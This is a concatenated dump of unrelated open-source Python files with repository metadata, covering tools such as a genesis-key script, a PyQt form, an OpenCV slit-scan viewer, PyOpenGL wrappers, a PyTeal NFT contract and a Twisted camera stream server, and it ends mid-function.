    parser.add_argument("-p", "--pretty", action="store_true", default=False, help="pretty print output")
    parser.add_argument("-s", "--secret", metavar="SECRET", default=None, help="private key generation secret")
    opts = parser.parse_args()
    if opts.secret is None:
        sys.stderr.write("missing required parameter --secret\n")
        sys.stderr.flush()
        sys.exit(1)
    with open(opts.accounts, "r") as f:
        accounts = json.load(f)
    initial_accounts = []
    initial_balances = []
    for e in accounts:
        name = e["name"]
        # Derive deterministic owner/active keypairs from the shared secret
        # (get_dev_key prints a JSON array with public_key/address fields).
        owner_str = subprocess.check_output(["programs/genesis_util/get_dev_key", opts.secret, "owner-"+name]).decode("utf-8")
        active_str = subprocess.check_output(["programs/genesis_util/get_dev_key", opts.secret, "active-"+name]).decode("utf-8")
        owner = json.loads(owner_str)
        active = json.loads(active_str)
        initial_accounts.append({
            "name" : name,
            "owner_key" : owner[0]["public_key"],
            "active_key" : active[0]["public_key"],
            "is_lifetime_member" : True,
            })
        for bal in e.get("balances", []):
            # Copy so the caller's input structure is not mutated.
            bal = dict(bal)
            bal["owner"] = active[0]["address"]
            initial_balances.append(bal)
    result = {
        "append" : {
            "initial_accounts" : initial_accounts },
        }
    if len(initial_balances) > 0:
        result["append"]["initial_balances"] = initial_balances
    # "-" means stdout, otherwise write to the named file.
    if opts.output == "-":
        dump_json( result, sys.stdout, opts.pretty )
        sys.stdout.flush()
    else:
        with open(opts.output, "w") as f:
            dump_json( result, f, opts.pretty )
    return
if __name__ == "__main__":
    main()
| 2,343 |
fileinfo/structure_files.py
|
klugem/recount-website
| 14 |
2023948
|
#!/usr/bin/env python
"""
structure_files.py
Symlinks to create directory structure for syncing Recount2 files with Amazon
Cloud Drive. Requires upload_table.tsv (in current directory).
Arg 1: root dir for files to upload
Arg 2: location of output of junctions_by_project.py and add_knowngene.py
"""
import sys
import os
from glob import glob
root_dir = sys.argv[1]
junctions_path = sys.argv[2]
# Create root dir if it doesn't exist.
# Idiom fix: exist_ok=True replaces the try/except-and-recheck dance and,
# unlike the old code, fails immediately if root_dir exists as a non-dir.
os.makedirs(root_dir, exist_ok=True)
current_project = None
# stdin is upload_table.tsv: <path>\t<basename>\t<project>, grouped by project.
for line in sys.stdin:
    filename, basename, project = line.strip().split('\t')
    if project != current_project:
        # First file of a new project: create <root>/<project>/bw.
        project_dir = os.path.join(root_dir, project)
        bw_dir = os.path.join(root_dir, project, 'bw')
        os.makedirs(bw_dir)
        current_project = project
    # Hard-link bigWigs into bw/, everything else at the project root.
    if basename.endswith('.bw'):
        os.link(filename, os.path.join(bw_dir, basename))
    else:
        os.link(filename, os.path.join(project_dir, basename))
os.link(
    '/dcl01/leek/data/tcga_work/tcga_recount_junctions/sample_ids.tsv',
    os.path.join(root_dir, 'sample_ids.tsv')
)
| 1,171 |
src/features/support.py
|
Cooomma/PyConHK-Mayday-Project
| 3 |
2024582
|
'''
Created on May 5, 2017
@author: Comma
'''
import traceback
from config.config import LogConfig, ContentConfig
from constants import conversations
from constants.stages import Stages
from constants.replykeyboards import ReplyKeyboards
from helpers.requests import RequestHelper
logger = LogConfig.logger
# NOTE(review): rebinding `conversations` hides the imported module of the
# same name — later code can only reach SupportEvents() through this object.
conversations = conversations.SupportEvents()
keyboards = ReplyKeyboards()
stage = Stages()
requests_helper = RequestHelper()
def list_events(bot, update, user_data):
    """Show the support-events menu and move to the SUPPORT_EVENT_START stage."""
    update.message.reply_text(conversations.LIST_EVENTS,
                              reply_markup=keyboards.support_event_keyboard_markup)
    return stage.SUPPORT_EVENT_START
def event_523(bot, update, user_data):
    """Reply with the 5/23 event info and record a promo metric for the user."""
    userid = update.message.from_user.id
    requests_helper.send_promo_metrics(userid, '523上班餘興節目')
    update.message.reply_text(conversations.EVENTS_523,
                              reply_markup=keyboards.support_event_keyboard_markup)
    update.message.reply_text(conversations.EVENT_BACK,
                              reply_markup=keyboards.support_event_keyboard_markup)
    return stage.SUPPORT_EVENT_START
def event_home_kong(bot, update, user_data):
    """Send the HOME KONG event text, its photos and credits, then return to
    the support-events menu stage, recording a promo metric for the user."""
    userid = update.message.from_user.id
    requests_helper.send_promo_metrics(userid, '《五月之約》尋回專屬HOME KONG場的感動')
    update.message.reply_text(conversations.EVENT_HOME_KONG)
    # Photo file ids/URLs (redacted placeholders in this copy).
    for pic in ['<KEY>',
                '<KEY>',
                '<KEY>']:
        update.message.reply_photo(pic)
    update.message.reply_text(conversations.EVENT_HOME_KONG_CREDIT)
    update.message.reply_text(conversations.EVENT_BACK, reply_markup=keyboards.support_event_keyboard_markup)
    return stage.SUPPORT_EVENT_START
| 1,672 |
Controller/cadastro_servicos.py
|
felipezago/ControleEstoque
| 0 |
2024607
|
from PyQt5 import QtGui
from PyQt5.QtWidgets import QMainWindow
class CadastroServicos(QMainWindow):
    """Modal dialog for registering a service (description + unit price)."""
    def __init__(self, parent=None):
        super(CadastroServicos, self).__init__(parent)
        from View.cadastro_servicos import Ui_ct_FormServicos
        from PyQt5 import QtCore
        from PyQt5.QtGui import QDoubleValidator
        # Set up the generated view.
        self.ui = Ui_ct_FormServicos()
        self.ui.setupUi(self)
        self.dialogs = list()
        # Freeze the window at its designed size.
        self.tamanho = self.size()
        self.setFixedSize(self.tamanho)
        self.setWindowIcon(QtGui.QIcon("Imagens/logo_fzr.png"))
        self.setWindowModality(QtCore.Qt.ApplicationModal)
        self.setWindowFlags(QtCore.Qt.WindowCloseButtonHint | QtCore.Qt.WindowMinimizeButtonHint)
        # Price accepts numbers 0-9999 with up to 4 decimals.
        validator_double = QDoubleValidator(0, 9999, 4)
        self.ui.tx_ValorUnitarioProduto.setValidator(validator_double)
        self.ui.tx_DescricaoServico.setMaxLength(60)
        self.ui.tx_ValorUnitarioProduto.textChanged.connect(self.converter_virgula)
        self.ui.bt_cancelar.clicked.connect(self.sair)
        # Bug fix: the save button was connected straight to salvar(), so
        # valida_campos() never ran and saving with an empty price crashed
        # float('') inside salvar(). Route the click through validation.
        self.ui.bt_salvar.clicked.connect(self.valida_campos)
    def resizeEvent(self, a0: QtGui.QResizeEvent) -> None:
        # Keep the window size fixed even if a resize slips through.
        self.setFixedSize(self.tamanho)
    def sair(self):
        """Close the dialog without saving."""
        self.close()
    def valida_campos(self):
        """Focus the first empty required field, or save when all are filled."""
        if not self.ui.tx_DescricaoServico.text():
            self.ui.tx_DescricaoServico.setFocus()
        elif not self.ui.tx_ValorUnitarioProduto.text():
            self.ui.tx_ValorUnitarioProduto.setFocus()
        else:
            self.salvar()
    def salvar(self):
        """Persist the service and report the outcome to the user."""
        from Model.Servicos import Servicos
        from PyQt5.QtWidgets import QMessageBox
        descricao = self.ui.tx_DescricaoServico.text().upper()
        preco = float(self.ui.tx_ValorUnitarioProduto.text())
        novo_servico = Servicos()
        novo_servico.descricao = descricao
        novo_servico.preco = preco
        try:
            novo_servico.inserir_servico()
        except Exception as error:
            QMessageBox.about(self, "Erro", str(error))
        else:
            QMessageBox.about(self, "Sucesso", "Cadastro efetuado com sucesso!")
            self.limpa_campos()
    def converter_virgula(self):
        """Replace a decimal comma with a dot as the user types the price."""
        valor = str(self.ui.tx_ValorUnitarioProduto.text())
        virgula = valor.find(',')
        if virgula > 0:
            self.ui.tx_ValorUnitarioProduto.setText(valor.replace(",", "."))
    def limpa_campos(self):
        """Clear the form fields after a successful save."""
        self.ui.tx_ValorUnitarioProduto.setText("")
        self.ui.tx_DescricaoServico.setText("")
| 2,549 |
settings.py
|
Khamies/T5-Fine-tune-Wikihow-XSum
| 0 |
2024292
|
# Experiment-wide settings.
global_setting = {
    "seed": 3111,  # RNG seed for reproducibility
}
# Model hyper-parameters.
# NOTE(review): embed/hidden/latent/note_size + lstm_layer read like an
# LSTM music-model config rather than a T5 fine-tune setup — confirm these
# keys are actually consumed by this project.
model_setting = {
    "embed_size": 300,
    "hidden_size": 256,
    "latent_size": 16,
    "note_size": 88,
    "lstm_layer": 1
}
# Training-loop configuration.
training_setting = {
    "epochs": 1,
    "tr_batch_size": 4,
    "val_batch_size": 4,
    "test_batch_size": 1,
    "lr" : 0.001,
    "metric": "rouge"
}
| 287 |
dataset/__init__.py
|
heebinYoo/variance-in-embedding-space
| 0 |
2024569
|
from .cars import Cars, Cars_hdf5
from .cub import CUBirds, CUBirds_hdf5, CUBirds_class, CUBirds_hdf5_alt, CUBirds_hdf5_bb
from .sop import SOProducts, SOProducts_hdf5
from .inshop import InShop, InShop_hdf5
from . import utils
"""
import resource
rlimit = resource.getrlimit(resource.RLIMIT_NOFILE)
print(rlimit)
resource.setrlimit(resource.RLIMIT_NOFILE, (rlimit[1], rlimit[1]))
"""
# Registry mapping a dataset key (as used in configs/CLI) to its class.
# The *_h5 variants read from HDF5 files instead of raw images.
# NOTE(review): 'sop_h5_mod' aliases the same class as 'sop_h5' — confirm
# this duplication is intentional.
_type = {
    'cars': Cars,
    'cars_h5': Cars_hdf5,
    'cub': CUBirds,
    'cub_h5': CUBirds_hdf5,
    'cub_class' : CUBirds_class,
    'sop': SOProducts,
    'sop_h5': SOProducts_hdf5,
    'sop_h5_mod': SOProducts_hdf5,
    'inshop': InShop,
    'inshop_h5': InShop_hdf5,
}
def load(name, root, source, classes, transform = None):
    """Instantiate the dataset registered under *name* in ``_type``."""
    dataset_cls = _type[name]
    return dataset_cls(root=root, source=source, classes=classes, transform=transform)
def load_inshop(name, root, source, classes, transform = None, dset_type='train'):
    """Instantiate an In-Shop dataset, which additionally takes *dset_type*."""
    dataset_cls = _type[name]
    return dataset_cls(root=root, source=source, classes=classes,
                       transform=transform, dset_type=dset_type)
| 1,024 |
src/SlitScanParameterSlider.py
|
AndrewFrauens/SlitScanCameraConcept
| 0 |
2023785
|
import numpy as np
import cv2
from typing import Tuple
class SlitScanParameterSlider:
    """OpenCV trackbar UI driving a slit-scan camera effect.

    Each frame, ``step_size`` source columns are copied into an
    accumulation image; trackbars control the step size, auto-advance,
    and the current column in both the source and the accumulation image.
    """

    def __init__(self, shape: Tuple[int, int, int], source_shape: Tuple[int, int, int], window_name: str):
        """*shape* / *source_shape* are (rows, cols, channels) image shapes."""
        self.accumulation_image = np.zeros(shape).astype(np.uint8)
        # Thin black divider drawn between the input and accumulation views.
        self.split_image = np.zeros((shape[0], 4, 3)).astype(np.uint8)
        self.window_name = window_name
        self.step_size = 2
        self.step_size_name = "step size"
        self.step_size_max_value = source_shape[1]
        self.step_through_source = 1  # 1 is truthy
        self.step_through_source_name = "step through source"
        self.step_through_source_max_value = 1
        self.source_location = 0
        self.source_location_max_value = source_shape[1]
        self.source_location_name = "source location"
        self.accumulation_image_location = 0
        self.accumulation_image_location_max_value = shape[1]
        self.accumulation_location_name = "accumulation location"

    # Trackbar callbacks: each stores the new value and echoes it back to
    # the trackbar so programmatic updates stay in sync with the UI.
    def set_step_size(self, step_size: int):
        self.step_size = step_size
        cv2.setTrackbarPos(self.step_size_name, self.window_name, self.step_size)

    def set_step_through_source(self, step_through_source):
        self.step_through_source = step_through_source
        cv2.setTrackbarPos(self.step_through_source_name, self.window_name, self.step_through_source)

    def set_source_location(self, source_location):
        self.source_location = source_location
        cv2.setTrackbarPos(self.source_location_name, self.window_name, self.source_location)

    def set_accumulation_location(self, accumulation_location):
        self.accumulation_image_location = accumulation_location
        cv2.setTrackbarPos(self.accumulation_location_name, self.window_name, self.accumulation_image_location)

    def start_viz(self):
        """Create the window and its four trackbars, then show the canvas."""
        cv2.namedWindow(self.window_name)
        cv2.createTrackbar(self.step_size_name, self.window_name, self.step_size, self.step_size_max_value,
                           self.set_step_size)
        cv2.createTrackbar(self.step_through_source_name, self.window_name, self.step_through_source,
                           self.step_through_source_max_value, self.set_step_through_source)
        cv2.createTrackbar(self.source_location_name, self.window_name, self.source_location,
                           self.source_location_max_value, self.set_source_location)
        cv2.createTrackbar(self.accumulation_location_name, self.window_name, self.accumulation_image_location,
                           self.accumulation_image_location_max_value, self.set_accumulation_location)
        cv2.imshow(self.window_name, self.accumulation_image)

    def update_image(self, input_frame):
        """Copy the current column span, advance if enabled, redraw, and return the composite."""
        # probably better to find openCV way to handle this
        # didn't want to deal with edge cases of the 4 ways that the indexes could be in or outside of bounds
        beam_image = np.copy(input_frame)
        for col_count in range(self.step_size):
            source_x = (self.source_location + col_count) % input_frame.shape[1]
            dest_x = (self.accumulation_image_location + col_count) % self.accumulation_image.shape[1]
            self.accumulation_image[:, dest_x] = input_frame[:, source_x]
            # BUGFIX: the vertical marker's bottom endpoint used the image
            # width (shape[1]); a vertical line must span the height (shape[0]).
            cv2.line(beam_image, (source_x, 0), (source_x, input_frame.shape[0]), (0, 0, 255))
        if (self.step_through_source == 1):
            self.set_source_location((self.source_location + self.step_size) % input_frame.shape[1])
            self.set_accumulation_location((self.accumulation_image_location + self.step_size) %
                                           self.accumulation_image.shape[1])
        cv2.imshow("input image", input_frame)
        cv2.imshow("accumulation image", self.accumulation_image)
        # Blend the column marker into the source view at 50% opacity.
        beam_bias = 0.5
        beam_image = cv2.addWeighted(beam_image, beam_bias, input_frame, 1 - beam_bias, 0)
        total_image = np.hstack((beam_image, self.split_image, self.accumulation_image))
        cv2.imshow(self.window_name, total_image)
        return total_image
| 4,033 |
env/Lib/site-packages/OpenGL/GL/VERSION/GL_3_3.py
|
5gconnectedbike/Navio2
| 210 |
2023053
|
'''OpenGL extension VERSION.GL_3_3
This module customises the behaviour of the
OpenGL.raw.GL.VERSION.GL_3_3 to provide a more
Python-friendly API
The official definition of this extension is available here:
http://www.opengl.org/registry/specs/VERSION/GL_3_3.txt
'''
from OpenGL import platform, constant, arrays
from OpenGL import extensions, wrapper
import ctypes
from OpenGL.raw.GL import _types, _glgets
from OpenGL.raw.GL.VERSION.GL_3_3 import *
from OpenGL.raw.GL.VERSION.GL_3_3 import _EXTENSION_NAME
def glInitGl33VERSION():
    '''Return boolean indicating whether this extension is available'''
    # Queries the live GL context's extension list for GL 3.3 support.
    from OpenGL import extensions
    return extensions.hasGLExtension( _EXTENSION_NAME )
# --- Autogenerated wrapper section -----------------------------------------
# Each wrapper.wrapper(...) call re-declares a raw GL 3.3 entry point with
# array-size metadata: setOutput() lets PyOpenGL allocate result arrays for
# the caller, setInputArraySize() declares (or deliberately skips) input
# array validation. Do not edit by hand below this line.
glGenSamplers=wrapper.wrapper(glGenSamplers).setOutput(
    'samplers',size=lambda x:(x,),pnameArg='count',orPassIn=True
)
# INPUT glDeleteSamplers.samplers size not checked against count
glDeleteSamplers=wrapper.wrapper(glDeleteSamplers).setInputArraySize(
    'samplers', None
)
# INPUT glSamplerParameteriv.param size not checked against 'pname'
glSamplerParameteriv=wrapper.wrapper(glSamplerParameteriv).setInputArraySize(
    'param', None
)
# INPUT glSamplerParameterfv.param size not checked against 'pname'
glSamplerParameterfv=wrapper.wrapper(glSamplerParameterfv).setInputArraySize(
    'param', None
)
# INPUT glSamplerParameterIiv.param size not checked against 'pname'
glSamplerParameterIiv=wrapper.wrapper(glSamplerParameterIiv).setInputArraySize(
    'param', None
)
# INPUT glSamplerParameterIuiv.param size not checked against 'pname'
glSamplerParameterIuiv=wrapper.wrapper(glSamplerParameterIuiv).setInputArraySize(
    'param', None
)
glGetSamplerParameteriv=wrapper.wrapper(glGetSamplerParameteriv).setOutput(
    'params',size=_glgets._glget_size_mapping,pnameArg='pname',orPassIn=True
)
glGetSamplerParameterIiv=wrapper.wrapper(glGetSamplerParameterIiv).setOutput(
    'params',size=_glgets._glget_size_mapping,pnameArg='pname',orPassIn=True
)
glGetSamplerParameterfv=wrapper.wrapper(glGetSamplerParameterfv).setOutput(
    'params',size=_glgets._glget_size_mapping,pnameArg='pname',orPassIn=True
)
glGetSamplerParameterIuiv=wrapper.wrapper(glGetSamplerParameterIuiv).setOutput(
    'params',size=_glgets._glget_size_mapping,pnameArg='pname',orPassIn=True
)
glGetQueryObjecti64v=wrapper.wrapper(glGetQueryObjecti64v).setOutput(
    'params',size=_glgets._glget_size_mapping,pnameArg='pname',orPassIn=True
)
glGetQueryObjectui64v=wrapper.wrapper(glGetQueryObjectui64v).setOutput(
    'params',size=_glgets._glget_size_mapping,pnameArg='pname',orPassIn=True
)
glVertexAttribP1uiv=wrapper.wrapper(glVertexAttribP1uiv).setInputArraySize(
    'value', 1
)
glVertexAttribP2uiv=wrapper.wrapper(glVertexAttribP2uiv).setInputArraySize(
    'value', 1
)
glVertexAttribP3uiv=wrapper.wrapper(glVertexAttribP3uiv).setInputArraySize(
    'value', 1
)
glVertexAttribP4uiv=wrapper.wrapper(glVertexAttribP4uiv).setInputArraySize(
    'value', 1
)
glVertexP2uiv=wrapper.wrapper(glVertexP2uiv).setInputArraySize(
    'value', 1
)
glVertexP3uiv=wrapper.wrapper(glVertexP3uiv).setInputArraySize(
    'value', 1
)
glVertexP4uiv=wrapper.wrapper(glVertexP4uiv).setInputArraySize(
    'value', 1
)
glTexCoordP1uiv=wrapper.wrapper(glTexCoordP1uiv).setInputArraySize(
    'coords', 1
)
glTexCoordP2uiv=wrapper.wrapper(glTexCoordP2uiv).setInputArraySize(
    'coords', 1
)
glTexCoordP3uiv=wrapper.wrapper(glTexCoordP3uiv).setInputArraySize(
    'coords', 1
)
glTexCoordP4uiv=wrapper.wrapper(glTexCoordP4uiv).setInputArraySize(
    'coords', 1
)
glMultiTexCoordP1uiv=wrapper.wrapper(glMultiTexCoordP1uiv).setInputArraySize(
    'coords', 1
)
glMultiTexCoordP2uiv=wrapper.wrapper(glMultiTexCoordP2uiv).setInputArraySize(
    'coords', 1
)
glMultiTexCoordP3uiv=wrapper.wrapper(glMultiTexCoordP3uiv).setInputArraySize(
    'coords', 1
)
glMultiTexCoordP4uiv=wrapper.wrapper(glMultiTexCoordP4uiv).setInputArraySize(
    'coords', 1
)
glNormalP3uiv=wrapper.wrapper(glNormalP3uiv).setInputArraySize(
    'coords', 1
)
glColorP3uiv=wrapper.wrapper(glColorP3uiv).setInputArraySize(
    'color', 1
)
glColorP4uiv=wrapper.wrapper(glColorP4uiv).setInputArraySize(
    'color', 1
)
glSecondaryColorP3uiv=wrapper.wrapper(glSecondaryColorP3uiv).setInputArraySize(
    'color', 1
)
### END AUTOGENERATED SECTION
| 4,291 |
examples/unique-nft-asa/assets/stateless.py
|
vuvth/algo-builder
| 90 |
2024629
|
import sys
sys.path.insert(0,'..')
from algobpy.parse import parse_params
from pyteal import *
def c_p_lsig(ARG_P, ARG_NFT_APP_ID):
    """Stateless contract (lsig) guarding payments for the unique-NFT app.

    - has `p` hardcoded as a constant;
    - requires any transaction from `C_p` (this) to be in a group of transactions with an
    App call.

    Args:
        ARG_P: the parameter `p` the app call's first argument must equal.
        ARG_NFT_APP_ID: application id of the stateful NFT app.
    """
    def basic_checks(txn: Txn): return And(
        # Reject rekeying and any form of account/asset close-out.
        txn.rekey_to() == Global.zero_address(),
        txn.close_remainder_to() == Global.zero_address(),
        txn.asset_close_to() == Global.zero_address()
    )
    # we take payment in this lsig only when paired with App call
    nft_creation = And(
        # verify first transaction (Payment)
        basic_checks(Gtxn[0]),
        Gtxn[0].type_enum() == TxnType.Payment,
        Gtxn[0].amount() == Int(10 ** 6), # 1 Algo
        # verify second transaction (OPT-IN)
        basic_checks(Gtxn[1]),
        Gtxn[1].type_enum() == TxnType.ApplicationCall,
        Gtxn[1].application_id() == Int(ARG_NFT_APP_ID),
        Btoi(Gtxn[1].application_args[0]) == Int(ARG_P),
        # verify third transaction (NFT creation)
        basic_checks(Gtxn[2]),
        Gtxn[2].type_enum() == TxnType.AssetConfig,
    )
    # Two-transaction groups are NFT transfers: app call + asset transfer.
    nft_transfer = And(
        basic_checks(Gtxn[0]),
        Gtxn[0].type_enum() == TxnType.ApplicationCall,
        Gtxn[0].application_id() == Int(ARG_NFT_APP_ID),
        basic_checks(Gtxn[1]),
        Gtxn[1].type_enum() == TxnType.AssetTransfer
    )
    # Dispatch on group size; any other group size rejects the transaction.
    program = Cond(
        [Global.group_size() == Int(3), nft_creation],
        [Global.group_size() == Int(2), nft_transfer]
    )
    return program
if __name__ == "__main__":
params = {
"ARG_P": 133,
"ARG_NFT_APP_ID": 99
}
# Overwrite params if sys.argv[1] is passed
if(len(sys.argv) > 1):
params = parse_params(sys.argv[1], params)
print(compileTeal(c_p_lsig(params["ARG_P"], params["ARG_NFT_APP_ID"]), Mode.Signature, version = 4))
| 1,908 |
dynamol/forcelaws.py
|
bessavagner/dynamol
| 0 |
2024295
|
import numpy as np
class LennardJones:
    """Dimensionless shifted-force Lennard-Jones interaction.

    Both the force and the potential are corrected so that they go to zero
    continuously at the cut-off radius (shifted-force scheme).
    """

    def __init__(self, cutoff=None):
        """Create the interaction.

        Args:
            cutoff (float, optional): cut-off radius. Defaults to 3.0.
        """
        self.cutoff = 3.0 if cutoff is None else cutoff
        # Plain (unshifted) force/potential at the cut-off, used below to
        # shift both curves to zero at r == cutoff.
        self.F_cutoff = self.__force(self.cutoff)
        self.V_cutoff = self.__potential(self.cutoff)

    def force(self, rij, idx=0):
        """Shifted-force LJ force for the separation vector *rij*.

        Args:
            rij (np.ndarray): displacement vector between two particles.
            idx (int, optional): particle index, printed before aborting
                when the separation is exactly zero.

        Returns:
            np.ndarray: force vector; zeros at or beyond the cut-off.
        """
        distance = np.linalg.norm(rij)
        if distance == 0:
            # Overlapping particles: report the offender and abort the run.
            print(idx)
            import sys
            sys.exit()
        if distance >= self.cutoff:
            return np.zeros(rij.shape[0])
        inv_r = 1.0 / distance
        inv_r6 = inv_r ** 6
        inv_r7 = inv_r * inv_r6
        magnitude = 48.0 * inv_r7 * (inv_r6 - 0.5) - self.F_cutoff
        return magnitude * rij / distance

    def potential(self, r, idx=0):
        """Shifted-force LJ potential at scalar separation *r*.

        Args:
            r (float): separation distance.
            idx (int, optional): particle index, printed before aborting
                when *r* is exactly zero.

        Returns:
            float: potential energy; 0 at or beyond the cut-off.
        """
        if r == 0:
            print(idx)
            import sys
            sys.exit()
        if r >= self.cutoff:
            return 0
        inv_r6 = (1.0 / r) ** 6
        plain = 4.0 * inv_r6 * (inv_r6 - 1.0)
        # Shifted-force correction: subtract the linear term so that both
        # V and dV/dr vanish at the cut-off.
        return plain - self.F_cutoff * (r - self.cutoff) - self.V_cutoff

    def __force(self, r):
        """Magnitude of the plain (unshifted) LJ force at separation *r*."""
        inv_r = 1.0 / r
        inv_r6 = inv_r ** 6
        return 48.0 * inv_r * inv_r6 * (inv_r6 - 0.5)

    def __potential(self, r):
        """Plain (unshifted) LJ potential at separation *r*."""
        inv_r6 = (1.0 / r) ** 6
        return 4.0 * inv_r6 * (inv_r6 - 1.0)
| 2,253 |
python/airi/stream.py
|
manuelnaranjo/AIRi
| 1 |
2023000
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
import time
from twisted.web import http, server
from twisted.internet import protocol
from twisted.internet import reactor
from twisted.internet import defer
from twisted.internet import task
from twisted.web.resource import Resource
from twisted.python import log
from logging import DEBUG
from airi.camera.protocol import CameraFactory
from airi.camera import Listener
from airi import report, RESULT
from functools import partial
MULTIPARTRESPONSE= "--%s\r\nContent-Type: %s\r\nContent-Length: %s\r\n\r\n%s\r\n\r\n"
HTTP_DISCONNECT_TIMEOUT = 30 # half a minute timeout
CATEGORY = "AIRi-Stream"
class MultiPartStream():
    """One HTTP client of a multipart (MJPEG-style) camera stream.

    Wraps a twisted ``request`` and writes frames to it as
    multipart/x-mixed-replace parts. The class attribute ``clients`` is the
    registry of all currently connected viewers (Python 2 codebase).
    """
    BOUNDARY = 'myBOUNDARY'
    # Class-level registry of all connected MultiPartStream instances.
    clients = []
    request = None
    oneshot = False
    @report(category=CATEGORY)
    def __init__(self, request):
        self.request = request
        # Hook the request teardown so this client deregisters itself.
        self.request.connectionLost = self.connectionLost
        self.request.multipart=self
        # Query-string flags: ?oneshot / ?thumbnail deliver one frame only.
        self.oneshot = self.request.args.get('oneshot', ['false',])[0].lower() == 'true'
        self.thumbnail = self.request.args.get('thumbnail', ['false',])[0].lower() == 'true'
        self.flash = 'flash' in self.request.args
        MultiPartStream.clients.append(self)
    @classmethod
    def getBoundary(klass):
        # Boundary marker written between multipart chunks.
        return "--%s\r\n" % (klass.BOUNDARY)
    def writeBoundary(self):
        self.request.write(MultiPartStream.getBoundary())
    def writeStop(self):
        # Closing boundary that terminates the multipart response.
        self.request.write("%s--\r\n" % MultiPartStream.getBoundary())
    @report(category=CATEGORY)
    def process(self):
        """Emit the HTTP headers appropriate for the requested mode."""
        self.request.setHeader('Cache-Control', 'no-cache, no-store, must-revalidate;')
        self.request.setHeader('Expires', '0');
        self.request.setHeader('Pragma-directive', 'no-cache')
        self.request.setHeader('Pragma', 'no-cache')
        self.request.setHeader('Cache-directive', 'no-cache')
        if not (self.oneshot or self.thumbnail):
            self.request.setHeader('Connection', 'Keep-Alive')
        if self.flash:
            #self.request.setHeader('Content-Type',
            #    'multipart/x-mixed-replace')
            self.request.setHeader('Content-Type',
                'text/html;')
        else:
            self.request.setHeader('Content-Type',
                'multipart/x-mixed-replace;boundary=%s' % (self.BOUNDARY))
    @report(category=CATEGORY)
    def connectionTimeout(self):
        '''Called after X seconds after the http stream is closed'''
        # If another viewer attached in the meantime, keep the camera link.
        if len(MultiPartStream.getClients(self.target)):
            return
        log.msg("No more clients, closing link")
        CameraFactory.disconnect(self.target)
        del self
    @report(category=CATEGORY)
    def connectionLost(self, reason):
        '''Called when the http stream is closed'''
        if self in MultiPartStream.clients:
            MultiPartStream.clients.remove(self)
        log.msg("Registering to disconnect in %s seconds" % HTTP_DISCONNECT_TIMEOUT)
        # Delay the camera disconnect so quick reconnects reuse the link.
        reactor.callLater(HTTP_DISCONNECT_TIMEOUT,
            MultiPartStream.connectionTimeout, self)
        StreamResource.tellClientCount(self.target)
    @report(category=CATEGORY)
    def finish(self):
        '''Gets called by oneshot or thumbnail modes'''
        try:
            self.request.finish()
        except Exception, err:
            log.err(err)
        MultiPartStream.clients.remove(self)
    def sendPart(self, content, mime="text/html", MULTIPART=None):
        # Single-frame modes write the bare payload and close; streaming
        # mode writes a multipart chunk (building it if not pre-rendered).
        if self.oneshot or self.thumbnail:
            try:
                self.request.setHeader("Content-Type", mime)
                self.request.setHeader("Content-Size", len(content))
                self.request.write(content)
                self.request.write("\n\n")
                self.finish()
            except Exception, err:
                log.msg("error during sendPart")
                log.err(err)
        else:
            if MULTIPART is None:
                MULTIPART=MULTIPARTRESPONSE % (MultiPartStream.BOUNDARY, mime, len(content), content)
            try:
                self.request.write(MULTIPART)
            except Exception, err:
                log.msg("error during sendPart")
                log.err(err)
    @classmethod
    def sendToClients(klass, content, mime="text/html"):
        # Render the multipart chunk once and fan it out to every client.
        if len(klass.clients) == 0:
            return
        size = len(content)
        out=MULTIPARTRESPONSE % (klass.BOUNDARY, mime, size, content)
        for client in klass.clients:
            client.sendPart(content, mime, out)
# log.msg("sendToClients, size: %s, count: %s" %(len(content), len(klass.clients)),
# loglevel=DEBUG,
# category="MultiPartStream")
    @classmethod
    def getClients(klass, address):
        # Case-insensitive selection of clients attached to *address*.
        def internal():
            for c in klass.clients:
                if c.target.lower() == address:
                    yield c
        address = address.lower()
        return list(internal())
class StreamResource(Resource, Listener):
    """twisted.web resource bridging camera frames to HTTP stream clients.

    Acts as a camera Listener: frames received for a Bluetooth address are
    fanned out to every MultiPartStream attached to that address.
    """
    isLeaf = True
    @classmethod
    def getClients(klass, address):
        return MultiPartStream.getClients(address)
    @classmethod
    @report(category=CATEGORY)
    def tellClientCount(klass, address):
        # Push the current viewer count to the web UI via UpdateManager.
        from airi.api import UpdateManager
        UpdateManager.propagate(address, {
            "client_count": len(klass.getClients(address))})
    def gotFrame(self, frame, address):
        # Called by the camera layer with one JPEG frame for *address*.
        size = len(frame)
        out=MULTIPARTRESPONSE % (MultiPartStream.BOUNDARY, "image/jpeg", size, frame)
        for client in StreamResource.getClients(address):
            client.sendPart(frame, "image/jpeg")
    @report(category=CATEGORY)
    def lostConnection(self, reason, failed, address):
        '''Called when the Bluetooth Link is lost'''
        print "StreamResource.lostConnection", address
        clients = StreamResource.getClients(address)
        for c in clients:
            # Tell each viewer why the stream ended, then tear it down.
            c.sendPart(str(reason))
            if not c.oneshot:
                try:
                    c.request.finish()
                except Exception, err:
                    log.err(err)
                MultiPartStream.clients.remove(c)
        StreamResource.tellClientCount(address)
    @report(category=CATEGORY, level=RESULT)
    def render_GET(self, request):
        # The URL path encodes the BT address with '_' instead of ':'.
        address = request.path.split("/",2)[-1].replace("_", ":")
        request.transport.socket.settimeout(5)
        multipart = MultiPartStream(request)
        multipart.process()
        multipart.target = address
        if len(address) == 17:
            ready = CameraFactory.isConnected(address) or CameraFactory.isPending(address)
            if multipart.thumbnail and not ready:
                # Thumbnail of a disconnected camera: reply empty rather
                # than forcing a connection attempt.
                multipart.sendPart("")
                return server.NOT_DONE_YET
            if not ready:
                method = CameraFactory.getCamera(address).get("transport", "rfcomm")
                method = request.args.get("method", [method,])[-1].upper()
                try:
                    CameraFactory.connect(address, method=method)
                except Exception, err:
                    log.msg("Failed while trying to connect")
                    log.err(err)
            CameraFactory.registerListener(address, self)
        StreamResource.tellClientCount(address)
        return server.NOT_DONE_YET
class TestStreamResource(Resource):
    # Debug resource: streams whatever frames sendFrame() (below) pushes.
    isLeaf = True
    def render_GET(self, request):
        log.msg(str(request))
        log.msg(str(request.requestHeaders))
        multipart = MultiPartStream(request)
        multipart.process()
        return server.NOT_DONE_YET
    def render_POST(self, request):
        # POST behaves identically to GET.
        return self.render_GET(request)
if __name__ == '__main__':
    # Stand-alone test server: capture frames from the local webcam and
    # stream them at ~15 fps on http://0.0.0.0:8800/stream
    import webcam
    from twisted.web.server import Site
    import sys
    log.startLogging(sys.stdout)
    webcam.init(False)
    def sendFrame():
        # Grab one frame, broadcast it, and reschedule ourselves.
